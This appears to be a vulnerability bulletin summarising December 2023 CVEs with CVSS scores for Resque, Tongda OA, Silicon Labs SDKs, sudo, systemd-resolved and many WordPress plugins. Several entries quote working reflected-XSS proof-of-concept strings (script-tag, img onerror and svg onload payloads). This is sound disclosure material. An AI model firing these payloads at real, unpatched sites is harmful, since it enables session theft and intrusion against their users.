Published: 2023-12-18 | CVSS Score: 6.1 | Source & Patch Info: CVE-2023-6927, secalert@redhat.com
resque -- resque
Resque (pronounced like "rescue") is a Redis-backed library for creating background jobs, placing those jobs on multiple queues, and processing them later. resque-web in resque versions before 2.1.0 is vulnerable to reflected XSS through the current_queue parameter in the path of the queues endpoint. This issue has been patched in version 2.1.0.
Published: 2023-12-21 | CVSS Score: 6.3 | Source & Patch Info: CVE-2023-50724, security-advisories@github.com
resque -- resque
Resque is a Redis-backed Ruby library for creating background jobs, placing them on multiple queues, and processing them later. The following paths in resque-web have been found to be vulnerable to reflected XSS: "/failed/?class=<script>alert(document.cookie)</script>" and "/queues/><img src=a onerror=alert(document.cookie)>". This issue has been patched in version 2.2.1.
Published: 2023-12-22 | CVSS Score: 6.3 | Source & Patch Info: CVE-2023-50725, security-advisories@github.com
resque -- resque
Resque is a Redis-backed Ruby library for creating background jobs, placing them on multiple queues, and processing them later. Reflected XSS issue occurs when /queues is appended with /"><svg%20onload=alert(domain)>. This issue has been patched in version 2.6.0.
Published: 2023-12-22 | CVSS Score: 6.3 | Source & Patch Info: CVE-2023-50727, security-advisories@github.com
satellite -- satellite
An arithmetic overflow flaw was found in Satellite when creating a new personal access token. This flaw allows an attacker who uses this arithmetic overflow to create personal access tokens that are valid indefinitely, resulting in damage to the system's integrity.
Published: 2023-12-18 | CVSS Score: 6 | Source & Patch Info: CVE-2023-4320, secalert@redhat.com
silabs -- z-wave_software_development_kit
A denial of service vulnerability exists in all Silicon Labs Z-Wave controller and endpoint devices running Z-Wave SDK v7.20.3 (Gecko SDK v4.3.3) and earlier. This attack can be carried out only by devices on the network sending a stream of packets to the device.
Published: 2023-12-15 | CVSS Score: 6.5 | Source & Patch Info: CVE-2023-5310, product-security@silabs.com
silicon_labs -- gsdk
An Observable Timing Discrepancy, Covert Timing Channel vulnerability in Silabs GSDK on ARM potentially allows Padding Oracle Crypto Attack on CBC PKCS7. This issue affects GSDK: through 4.4.0.
Published: 2023-12-21 | CVSS Score: 4.6 | Source & Patch Info: CVE-2023-41097, product-security@silabs.com
skupper_operator -- skupper_operator
A flaw was found in the Skupper operator, which may permit a certain configuration to create a service account that would allow an authenticated attacker in the adjacent cluster to view deployments in all namespaces in the cluster. This issue permits unauthorized viewing of information outside of the user's purview.
Published: 2023-12-18 | CVSS Score: 6.8 | Source & Patch Info: CVE-2023-5056, secalert@redhat.com
snowflakedb -- snowflake-connector-net
The Snowflake .NET driver provides an interface to the Microsoft .NET open source software framework for developing applications. Snowflake recently received a report about a vulnerability in the Snowflake Connector .NET where the checks against the Certificate Revocation List (CRL) were not performed where the insecureMode flag was set to false, which is the default setting. The vulnerability affects versions between 2.0.25 and 2.1.4 (inclusive). Snowflake fixed the issue in version 2.1.5.
Published: 2023-12-22 | CVSS Score: 6 | Source & Patch Info: CVE-2023-51662, security-advisories@github.com
softnext -- mail_sqr_expert
Softnext Mail SQR Expert is an email management platform. It has a Local File Inclusion (LFI) vulnerability in a special URL. An unauthenticated remote attacker can exploit this vulnerability to execute an arbitrary PHP file with .asp file extension under specific system paths, to access and modify partial system information but does not affect service availability.
Published: 2023-12-15 | CVSS Score: 6.5 | Source & Patch Info: CVE-2023-48381, twcert@cert.org.tw
softnext -- mail_sqr_expert
Softnext Mail SQR Expert is an email management platform. It has a Local File Inclusion (LFI) vulnerability in a mail deliver-related URL. An unauthenticated remote attacker can exploit this vulnerability to execute an arbitrary PHP file with .asp file extension under specific system paths, to access and modify partial system information but does not affect service availability.
Published: 2023-12-15 | CVSS Score: 6.5 | Source & Patch Info: CVE-2023-48382, twcert@cert.org.tw
softnext -- mail_sqr_expert
Softnext Mail SQR Expert is an email management platform. It has inadequate filtering for a specific URL parameter within a specific function. An unauthenticated remote attacker can perform a Blind SSRF attack to discover internal network topology based on the URL error response.
Published: 2023-12-15 | CVSS Score: 5.3 | Source & Patch Info: CVE-2023-48379, twcert@cert.org.tw
sourcecodester -- simple_image_stack_website
A vulnerability was found in SourceCodester Simple Image Stack Website 1.0. It has been rated as problematic. This issue affects some unknown processing. The manipulation of the argument search with the input sy2ap%22%3e%3cscript%3ealert(1)%3c%2fscript%3etkxh1 leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248255.
Published: 2023-12-17 | CVSS Score: 6.1 | Source & Patch Info: CVE-2023-6896, cna@vuldb.com
sourcecodester -- simple_student_attendance_system
A vulnerability was found in SourceCodester Simple Student Attendance System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality. The manipulation of the argument page leads to path traversal: '../filedir'. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248749 was assigned to this vulnerability.
Published: 2023-12-22 | CVSS Score: 6.3 | Source & Patch Info: CVE-2023-7058, cna@vuldb.com
sudo -- sudo
A flaw was found in sudo in the handling of ipa_hostname, where ipa_hostname from /etc/sssd/sssd.conf was not propagated in sudo. Therefore, it leads to privilege mismanagement vulnerability in applications, where client hosts retain privileges even after retracting them.
Published: 2023-12-23 | CVSS Score: 6.6 | Source & Patch Info: CVE-2023-7090, secalert@redhat.com
systemd-resolved -- systemd-resolved
A vulnerability was found in systemd-resolved. This issue may allow systemd-resolved to accept records of DNSSEC-signed domains even when they have no signature, allowing man-in-the-middles (or the upstream DNS resolver) to manipulate records.
Published: 2023-12-23 | CVSS Score: 5.9 | Source & Patch Info: CVE-2023-7008, secalert@redhat.com
taiwan-ca -- jcicsecuritytool
TAIWAN-CA (TWCA) JCICSecurityTool's Registry-related functions have insufficient filtering for special characters. An unauthenticated remote attacker can inject malicious script into a webpage to perform an XSS (Stored Cross-Site Scripting) attack.
Published: 2023-12-15 | CVSS Score: 6.1 | Source & Patch Info: CVE-2023-48387, twcert@cert.org.tw
tcpreplay -- tcpreplay
Within tcpreplay's tcprewrite, a double free vulnerability has been identified in the tcpedit_dlt_cleanup() function within plugins/dlt_plugins.c. This vulnerability can be exploited by supplying a specifically crafted file to the tcprewrite binary. This flaw enables a local attacker to initiate a Denial of Service (DoS) attack.
Published: 2023-12-21 | CVSS Score: 5.5 | Source & Patch Info: CVE-2023-4256, secalert@redhat.com
tongda -- tongda_office_anywhere
A vulnerability was found in Tongda OA 2017 up to 11.9 and classified as critical. This issue affects some unknown processing of the file general/wiki/cp/ct/view.php. The manipulation of the argument TEMP_ID leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-248567. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
Published: 2023-12-21 | CVSS Score: 6.3 | Source & Patch Info: CVE-2023-7020, cna@vuldb.com
tongda -- tongda_office_anywhere
A vulnerability was found in Tongda OA 2017 up to 11.9. It has been classified as critical. Affected is an unknown function of the file general/vehicle/checkup/delete_search.php. The manipulation of the argument VU_ID leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248568. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
Published: 2023-12-21 | CVSS Score: 6.3 | Source & Patch Info: CVE-2023-7021, cna@vuldb.com
tongda -- tongda_office_anywhere
A vulnerability was found in Tongda OA 2017 up to 11.9. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file general/work_plan/manage/delete_all.php. The manipulation of the argument DELETE_STR leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248569 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
Published: 2023-12-21 | CVSS Score: 6.3 | Source & Patch Info: CVE-2023-7022, cna@vuldb.com
tongda -- tongda_office_anywhere
A vulnerability was found in Tongda OA 2017 up to 11.9. It has been rated as critical. Affected by this issue is some unknown functionality of the file general/vehicle/query/delete.php. The manipulation of the argument VU_ID leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. VDB-248570 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
Published: 2023-12-21 | CVSS Score: 6.3 | Source & Patch Info: CVE-2023-7023, cna@vuldb.com
uffizio -- gps_tracker
An Open Redirection vulnerability exists in all versions of Uffizio's GPS Tracker that allows an attacker to construct a URL within the application that causes a redirection to an arbitrary external domain.
Published: 2023-12-16 | CVSS Score: 6.1 | Source & Patch Info: CVE-2020-17484, cve@mitre.org
uyumsoft -- lioxerp
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Uyumsoft Information System and Technologies LioXERP allows Reflected XSS. This issue affects LioXERP: before v.146.
Published: 2023-12-21 | CVSS Score: 6.1 | Source & Patch Info: CVE-2023-5988, iletisim@usom.gov.tr
uyumsoft -- lioxerp
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Uyumsoft Information System and Technologies LioXERP allows Stored XSS. This issue affects LioXERP: before v.146.
Published: 2023-12-21 | CVSS Score: 5.4 | Source & Patch Info: CVE-2023-5989, iletisim@usom.gov.tr
w3m -- w3m
An out-of-bounds write issue has been discovered in the backspace handling of the checkType() function in etc.c within the W3M application. This vulnerability is triggered by supplying a specially crafted HTML file to the w3m binary. Exploitation of this flaw could lead to application crashes, resulting in a denial of service condition.
Published: 2023-12-21 | CVSS Score: 5.5 | Source & Patch Info: CVE-2023-4255, secalert@redhat.com
wordpress -- wordpress
Server-Side Request Forgery (SSRF) vulnerability in GiveWP GiveWP - Donation Plugin and Fundraising Platform. This issue affects GiveWP - Donation Plugin and Fundraising Platform: from n/a through 2.25.1.
Published: 2023-12-18 | CVSS Score: 6.5 | Source & Patch Info: CVE-2022-40312, audit@patchstack.com
wordpress -- wordpress
Unrestricted Upload of File with Dangerous Type vulnerability in Glen Don L. Mongaya Drag and Drop Multiple File Upload for WooCommerce. This issue affects Drag and Drop Multiple File Upload for WooCommerce: from n/a through 1.0.8.
Published: 2023-12-21 | CVSS Score: 6.5 | Source & Patch Info: CVE-2022-45377, audit@patchstack.com
wordpress -- wordpress
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Tribulant Slideshow Gallery LITE. This issue affects Slideshow Gallery LITE: from n/a through 1.7.6.
Published: 2023-12-20 | CVSS Score: 6.7 | Source & Patch Info: CVE-2023-28491, audit@patchstack.com
wordpress -- wordpress
Authorization Bypass Through User-Controlled Key vulnerability in WooCommerce Shipping Multiple Addresses. This issue affects Shipping Multiple Addresses: from n/a through 3.8.3.
Published: 2023-12-21 | CVSS Score: 6.5 | Source & Patch Info: CVE-2023-32799, audit@patchstack.com
wordpress -- wordpress
URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Magazine3 Core Web Vitals & PageSpeed Booster. This issue affects Core Web Vitals & PageSpeed Booster: from n/a through 1.0.12.
Published: 2023-12-19 | CVSS Score: 6.1 | Source & Patch Info: CVE-2023-35883, audit@patchstack.com
wordpress -- wordpress
URL Redirection to Untrusted Site ('Open Redirect') vulnerability in CRM Perks Integration for Salesforce and Contact Form 7, WPForms, Elementor, Ninja Forms. This issue affects Integration for Salesforce and Contact Form 7, WPForms, Elementor, Ninja Forms: from n/a through 1.3.3.
Published: 2023-12-19 | CVSS Score: 6.1 | Source & Patch Info: CVE-2023-37982, audit@patchstack.com
wordpress -- wordpress
URL Redirection to Untrusted Site ('Open Redirect') vulnerability in CRM Perks Integration for WooCommerce and QuickBooks. This issue affects Integration for WooCommerce and QuickBooks: from n/a through 1.2.3.
Published: 2023-12-19 | CVSS Score: 6.1 | Source & Patch Info: CVE-2023-38478, audit@patchstack.com
wordpress -- wordpress
URL Redirection to Untrusted Site ('Open Redirect') vulnerability in CRM Perks Integration for WooCommerce and Zoho CRM, Books, Invoice, Inventory, Bigin. This issue affects Integration for WooCommerce and Zoho CRM, Books, Invoice, Inventory, Bigin: from n/a before 1.3.7.
Published: 2023-12-19 | CVSS Score: 6.1 | Source & Patch Info: CVE-2023-38481, audit@patchstack.com
wordpress -- wordpress
URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Doofinder Doofinder WP & WooCommerce Search. This issue affects Doofinder WP & WooCommerce Search: from n/a through 1.5.49.
Published: 2023-12-19 | CVSS Score: 6.1 | Source & Patch Info: CVE-2023-40602, audit@patchstack.com
wordpress -- wordpress
URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Swapnil V. Patil Login and Logout Redirect. This issue affects Login and Logout Redirect: from n/a through 2.0.3.
Published: 2023-12-19 | CVSS Score: 6.1 | Source & Patch Info: CVE-2023-41648, audit@patchstack.com
wordpress -- wordpress
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Jordy Meow Media File Renamer: Rename Files (Manual, Auto & AI). This issue affects Media File Renamer: Rename Files (Manual, Auto & AI): from n/a through 5.6.9.
Published: 2023-12-19 | CVSS Score: 6.5 | Source & Patch Info: CVE-2023-44991, audit@patchstack.com
wordpress -- wordpress
URL Redirection to Untrusted Site ('Open Redirect') vulnerability in SERVIT Software Solutions affiliate-toolkit - WordPress Affiliate Plugin. This issue affects affiliate-toolkit - WordPress Affiliate Plugin: from n/a through 3.3.9.
Published: 2023-12-19 | CVSS Score: 6.1 | Source & Patch Info: CVE-2023-45105, audit@patchstack.com
wordpress -- wordpress
Authorization Bypass Through User-Controlled Key vulnerability in KaineLabs Youzify - BuddyPress Community, User Profile, Social Network & Membership Plugin for WordPress. This issue affects Youzify - BuddyPress Community, User Profile, Social Network & Membership Plugin for WordPress: from n/a through 1.2.2.
Published: 2023-12-21 | CVSS Score: 6.5 | Source & Patch Info: CVE-2023-47191, audit@patchstack.com
wordpress -- wordpress
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Mahlamusa Who Hit The Page - Hit Counter allows SQL Injection. This issue affects Who Hit The Page - Hit Counter: from n/a through 1.4.14.3.
Published: 2023-12-18 | CVSS Score: 6.5 | Source & Patch Info: CVE-2023-47558, audit@patchstack.com
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in captainform Forms by CaptainForm - Form Builder for WordPress allows Reflected XSS. This issue affects Forms by CaptainForm - Form Builder for WordPress: from n/a through 2.5.3.
Published: 2023-12-15 | CVSS Score: 6.1 | Source & Patch Info: CVE-2023-49170, audit@patchstack.com
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CodeRevolution WP Pocket URLs allows Reflected XSS. This issue affects WP Pocket URLs: from n/a through 1.0.2.
Published: 2023-12-15 | CVSS Score: 6.1 | Source & Patch Info: CVE-2023-49176, audit@patchstack.com
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Gilles Dumas which template file allows Reflected XSS. This issue affects which template file: from n/a through 4.9.0.
Published: 2023-12-15 | CVSS Score: 6.1 | Source & Patch Info: CVE-2023-49177, audit@patchstack.com
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Mr. Hdwplayer HDW Player Plugin (Video Player & Video Gallery) allows Reflected XSS. This issue affects HDW Player Plugin (Video Player & Video Gallery): from n/a through 5.0.
Published: 2023-12-15 | CVSS Score: 6.1 | Source & Patch Info: CVE-2023-49178, audit@patchstack.com
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Fabio Marzocca List all posts by Authors, nested Categories and Titles allows Reflected XSS. This issue affects List all posts by Authors, nested Categories and Titles: from n/a through 2.7.10.
Published: 2023-12-15 | CVSS Score: 6.1 | Source & Patch Info: CVE-2023-49182, audit@patchstack.com
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in NextScripts NextScripts: Social Networks Auto-Poster allows Reflected XSS. This issue affects NextScripts: Social Networks Auto-Poster: from n/a through 4.4.2.
Published: 2023-12-15 | CVSS Score: 6.1 | Source & Patch Info: CVE-2023-49183, audit@patchstack.com
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Doofinder Doofinder WP & WooCommerce Search allows Reflected XSS. This issue affects Doofinder WP & WooCommerce Search: from n/a through 2.1.7.
Published: 2023-12-15 | CVSS Score: 6.1 | Source & Patch Info: CVE-2023-49185, audit@patchstack.com
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Spoonthemes Adifier - Classified Ads WordPress Theme allows Reflected XSS. This issue affects Adifier - Classified Ads WordPress Theme: from n/a before 3.1.4.
Published: 2023-12-15 | CVSS Score: 6.1 | Source & Patch Info: CVE-2023-49187, audit@patchstack.com
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in smp7, wp.Insider Simple Membership allows Reflected XSS. This issue affects Simple Membership: from n/a through 4.3.8.
Published: 2023-12-19 | CVSS Score: 6.1 | Source & Patch Info: CVE-2023-50376, audit@patchstack.com
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Currency.Wiki Currency Converter Widget - Exchange Rates allows Stored XSS. This issue affects Currency Converter Widget - Exchange Rates: from n/a through 3.0.2.
Published: 2023-12-21 | CVSS Score: 6.5 | Source & Patch Info: CVE-2023-50822, audit@patchstack.com
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Wipeout Media CSS & JavaScript Toolbox allows Stored XSS. This issue affects CSS & JavaScript Toolbox: from n/a through 11.7.
Published: 2023-12-21 | CVSS Score: 6.5 | Source & Patch Info: CVE-2023-50823, audit@patchstack.com
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Brian Batt Insert or Embed Articulate Content into WordPress allows Stored XSS. This issue affects Insert or Embed Articulate Content into WordPress: from n/a through 4.3000000021.
Published: 2023-12-21 | CVSS Score: 6.5 | Source & Patch Info: CVE-2023-50824, audit@patchstack.com
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Terrier Tenacity iframe Shortcode allows Stored XSS. This issue affects iframe Shortcode: from n/a through 2.0.
Published: 2023-12-21 | CVSS Score: 6.5 | Source & Patch Info: CVE-2023-50825, audit@patchstack.com
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in VillaTheme CURCY - Multi Currency for WooCommerce allows Stored XSS. This issue affects CURCY - Multi Currency for WooCommerce: from n/a through 2.2.0.
Published: 2023-12-21 | CVSS Score: 6.5 | Source & Patch Info: CVE-2023-50831, audit@patchstack.com
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ExtendThemes Colibri Page Builder allows Stored XSS. This issue affects Colibri Page Builder: from n/a through 1.0.239.
Published: 2023-12-21 | CVSS Score: 6.5 | Source & Patch Info: CVE-2023-50833, audit@patchstack.com
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in August Infotech WooCommerce Menu Extension allows Stored XSS. This issue affects WooCommerce Menu Extension: from n/a through 1.6.2.
Published: 2023-12-21 | CVSS Score: 6.5 | Source & Patch Info: CVE-2023-50834, audit@patchstack.com
wordpress -- wordpress
The Product Catalog Mode For WooCommerce WordPress plugin before 5.0.3 does not properly authorize settings updates or escape settings values, leading to stored XSS by unauthenticated users.
Published: 2023-12-18 | CVSS Score: 6.1 | Source & Patch Info: CVE-2023-5348, contact@wpscan.com
wordpress -- wordpress
The Slider WordPress plugin before 3.5.12 does not ensure that posts to be accessed via an AJAX action are slides and can be viewed by the user making the request, allowing any authenticated user, such as a subscriber, to access the content of arbitrary posts, such as private, draft and password-protected ones.
Published: 2023-12-18 | CVSS Score: 6.5 | Source & Patch Info: CVE-2023-6077, contact@wpscan.com
wordpress -- wordpress
The Divi theme for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'et_pb_text' shortcode in all versions up to, and including, 4.23.1 due to insufficient input sanitization and output escaping on user supplied custom field data. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Published: 2023-12-23 | CVSS Score: 6.4 | Source & Patch Info: CVE-2023-6744, security@wordfence.com
wordpress -- wordpress
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Popup Maker Popup Maker - Popup for opt-ins, lead gen, & more. This issue affects Popup Maker - Popup for opt-ins, lead gen, & more: from n/a through 1.17.1.
Published: 2023-12-20 | CVSS Score: 5.3 | Source & Patch Info: CVE-2022-47597, audit@patchstack.com
wordpress -- wordpress
Deserialization of Untrusted Data vulnerability in File Manager by Bit Form Team File Manager - 100% Free & Open Source File Manager Plugin for WordPress | Bit File Manager. This issue affects File Manager - 100% Free & Open Source File Manager Plugin for WordPress | Bit File Manager: from n/a through 5.2.7.
Published: 2023-12-20 | CVSS Score: 5.5 | Source & Patch Info: CVE-2022-47599, audit@patchstack.com
wordpress -- wordpress
Missing Authorization, Cross-Site Request Forgery (CSRF) vulnerability in Hal Gatewood Dashicons + Custom Post Types. This issue affects Dashicons + Custom Post Types: from n/a through 1.0.2.
Published: 2023-12-21 | CVSS Score: 5.4 | Source & Patch Info: CVE-2023-22674, audit@patchstack.com
wordpress -- wordpress
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Smackcoders Export All Posts, Products, Orders, Refunds & Users. This issue affects Export All Posts, Products, Orders, Refunds & Users: from n/a through 2.4.1.
Published: 2023-12-21 | CVSS Score: 5.9 | Source & Patch Info: CVE-2023-2487, audit@patchstack.com
wordpress -- wordpressMissing Authorization vulnerability in GamiPress GamiPress - The #1 gamification plugin to reward points, achievements, badges & ranks in WordPress. This issue affects GamiPress - The #1 gamification plugin to reward points, achievements, badges & ranks in WordPress: from n/a through 2.5.6.2023-12-195.4CVE-2023-25715
audit@patchstack.com
wordpress -- wordpressExposure of Sensitive Information to an Unauthorized Actor vulnerability in Winwar Media WordPress Email Marketing Plugin - WP Email Capture. This issue affects WordPress Email Marketing Plugin - WP Email Capture: from n/a through 3.10.2023-12-215.3CVE-2023-28421
audit@patchstack.com
wordpress -- wordpressAuthorization Bypass Through User-Controlled Key vulnerability in WooCommerce WooCommerce Bookings. This issue affects WooCommerce Bookings: from n/a through 1.15.78.2023-12-215.4CVE-2023-32747
audit@patchstack.com
wordpress -- wordpressAuthorization Bypass Through User-Controlled Key vulnerability in MarketingFire Editorial Calendar. This issue affects Editorial Calendar: from n/a through 3.7.12.2023-12-205.4CVE-2023-36520
audit@patchstack.com
wordpress -- wordpressAuthorization Bypass Through User-Controlled Key vulnerability in Jordy Meow Photo Engine (Media Organizer & Lightroom). This issue affects Photo Engine (Media Organizer & Lightroom): from n/a through 6.2.5.2023-12-205.4CVE-2023-38513
audit@patchstack.com
wordpress -- wordpressAuthorization Bypass Through User-Controlled Key vulnerability in WP Sunshine Sunshine Photo Cart: Free Client Galleries for Photographers. This issue affects Sunshine Photo Cart: Free Client Galleries for Photographers: from n/a before 3.0.0.2023-12-205.3CVE-2023-41796
audit@patchstack.com
wordpress -- wordpressExposure of Sensitive Information to an Unauthorized Actor vulnerability in Jordy Meow Perfect Images (Manage Image Sizes, Thumbnails, Replace, Retina). This issue affects Perfect Images (Manage Image Sizes, Thumbnails, Replace, Retina): from n/a through 6.4.5.2023-12-195.3CVE-2023-44982
audit@patchstack.com
wordpress -- wordpressExposure of Sensitive Information to an Unauthorized Actor vulnerability in Aruba.It Aruba HiSpeed Cache. This issue affects Aruba HiSpeed Cache: from n/a through 2.0.6.2023-12-195.3CVE-2023-44983
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in A WP Life Event Monster - Event Management, Tickets Booking, Upcoming Event allows Stored XSS. This issue affects Event Monster - Event Management, Tickets Booking, Upcoming Event: from n/a through 1.3.2.2023-12-215.9CVE-2023-47525
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Sajjad Hossain Sagor WP Edit Username allows Stored XSS. This issue affects WP Edit Username: from n/a through 1.0.5.2023-12-215.9CVE-2023-47527
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Till Krüss Email Address Encoder allows Stored XSS. This issue affects Email Address Encoder: from n/a through 1.0.22.2023-12-155.4CVE-2023-48765
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Kulwant Nagi Affiliate Booster - Pros & Cons, Notice, and CTA Blocks for Affiliates. This issue affects Affiliate Booster - Pros & Cons, Notice, and CTA Blocks for Affiliates: from n/a through 3.0.5.2023-12-185.4CVE-2023-49148
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in formzu Inc. Formzu WP allows Stored XSS. This issue affects Formzu WP: from n/a through 1.6.6.2023-12-155.4CVE-2023-49160
audit@patchstack.com
| wordpress -- wordpress | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in BigCommerce BigCommerce For WordPress. This issue affects BigCommerce For WordPress: from n/a through 5.0.6. | 2023-12-21 | 5.3 | CVE-2023-49162 (audit@patchstack.com) |
| wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Real Big Plugins Client Dash allows Stored XSS. This issue affects Client Dash: from n/a through 2.2.1. | 2023-12-15 | 5.4 | CVE-2023-49165 (audit@patchstack.com) |
| wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in datafeedr.Com Ads by datafeedr.Com allows Stored XSS. This issue affects Ads by datafeedr.Com: from n/a through 1.2.0. | 2023-12-15 | 5.4 | CVE-2023-49169 (audit@patchstack.com) |
| wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in dFactory Responsive Lightbox & Gallery allows Stored XSS. This issue affects Responsive Lightbox & Gallery: from n/a through 2.4.5. | 2023-12-15 | 5.4 | CVE-2023-49174 (audit@patchstack.com) |
| wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kreativo Pro KP Fastest Tawk.To Chat allows Stored XSS. This issue affects KP Fastest Tawk.To Chat: from n/a through 1.1.1. | 2023-12-15 | 5.4 | CVE-2023-49175 (audit@patchstack.com) |
| wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in N.O.U.S. Open Useful and Simple Event post allows Stored XSS. This issue affects Event post: from n/a through 5.8.6. | 2023-12-15 | 5.4 | CVE-2023-49179 (audit@patchstack.com) |
| wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Event Manager WP Event Manager - Events Calendar, Registrations, Sell Tickets with WooCommerce allows Stored XSS. This issue affects WP Event Manager - Events Calendar, Registrations, Sell Tickets with WooCommerce: from n/a through 3.1.40. | 2023-12-15 | 5.4 | CVE-2023-49181 (audit@patchstack.com) |
| wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPDeveloper Parallax Slider Block allows Stored XSS. This issue affects Parallax Slider Block: from n/a through 1.2.4. | 2023-12-15 | 5.4 | CVE-2023-49184 (audit@patchstack.com) |
| wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WebFactory Ltd Guest Author allows Stored XSS. This issue affects Guest Author: from n/a through 2.3. | 2023-12-15 | 5.4 | CVE-2023-49747 (audit@patchstack.com) |
| wordpress -- wordpress | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in AppMySite AppMySite - Create an app with the Best Mobile App Builder. This issue affects AppMySite - Create an app with the Best Mobile App Builder: from n/a through 3.11.0. | 2023-12-21 | 5.3 | CVE-2023-49762 (audit@patchstack.com) |
| wordpress -- wordpress | Authorization Bypass Through User-Controlled Key vulnerability in J.N. Breetvelt a.K.A. OpaJaap WP Photo Album Plus. This issue affects WP Photo Album Plus: from n/a through 8.5.02.005. | 2023-12-19 | 5.3 | CVE-2023-49812 (audit@patchstack.com) |
| wordpress -- wordpress | Cross-Site Request Forgery (CSRF) vulnerability in LiveChat LiveChat - WP live chat plugin for WordPress. This issue affects LiveChat - WP live chat plugin for WordPress: from n/a through 4.5.15. | 2023-12-18 | 5.4 | CVE-2023-49821 (audit@patchstack.com) |
| wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BoldThemes Bold Page Builder allows Stored XSS. This issue affects Bold Page Builder: from n/a through 4.6.1. | 2023-12-15 | 5.4 | CVE-2023-49823 (audit@patchstack.com) |
| wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in AB-WP Simple Counter allows Stored XSS. This issue affects Simple Counter: from n/a through 1.0.2. | 2023-12-21 | 5.9 | CVE-2023-50377 (audit@patchstack.com) |
| wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Freshlight Lab Menu Image, Icons made easy allows Stored XSS. This issue affects Menu Image, Icons made easy: from n/a through 3.10. | 2023-12-21 | 5.9 | CVE-2023-50826 (audit@patchstack.com) |
| wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Accredible Accredible Certificates & Open Badges allows Stored XSS. This issue affects Accredible Certificates & Open Badges: from n/a through 1.4.8. | 2023-12-21 | 5.9 | CVE-2023-50827 (audit@patchstack.com) |
